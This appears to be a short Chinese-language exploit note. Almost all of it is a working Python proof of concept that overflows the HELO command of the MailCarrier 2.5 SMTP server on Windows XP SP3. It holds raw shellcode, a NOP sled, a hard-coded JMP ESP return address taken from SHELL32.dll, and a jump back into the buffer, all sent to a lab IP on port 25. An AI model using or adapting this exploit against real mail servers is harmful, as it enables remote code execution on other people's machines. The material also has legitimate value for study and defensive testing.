软件名称: mailcarrier25
环境: XP SP3 正常情况下
发现一般都会有检测字符串,要构造攻击还是有点难度的····
E-MAIL 程序, 无验证登陆 发送消息
熟悉 SMTP 协议指令
python poc:
import struct import socket s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) shellcode =( '\x31\xD2\xB2\x30\x64\x8B\x12\x8B\x52\x0C\x8B\x52\x1C\x8B\x42\x08\x8B\x72\x20\x8B' '\x12\x80\x7E\x0C\x33\x75\xF2\x89\xC7\x03\x78\x3C\x8B\x57\x78\x01\xC2\x8B\x7A\x20' '\x01\xC7\x31\xED\x8B\x34\xAF\x01\xC6\x45\x81\x3E\x46\x61\x74\x61\x75\xF2\x81\x7E' '\x08\x45\x78\x69\x74\x75\xE9\x8B\x7A\x24\x01\xC7\x66\x8B\x2C\x6F\x8B\x7A\x1C\x01' '\xC7\x8B\x7C\xAF\xFC\x01\xC7\x68\x64\x61\x40\x01\x68\x40\x70\x61\x6E\x89\xE1\xFE' '\x49\x07\x31\xC0\x51\x50\xFF\xD7')#108 bytes buffer = shellcode +'\x90'*(5094-108)+ ('\xb3\x9a\xd0\x7d')+('\xe9\x11\xec\xff\xff\x90') #must have () #Found JMP ESP at 0x7dd09ab3 Module: C:\WINDOWS\system32\SHELL32.dll try: s.connect(('10.10.10.130',25)) s.send('HELO ' + buffer + '\r\n') h = s.recv(1024) print h s.close() except: print 'could not connect to SMTP!'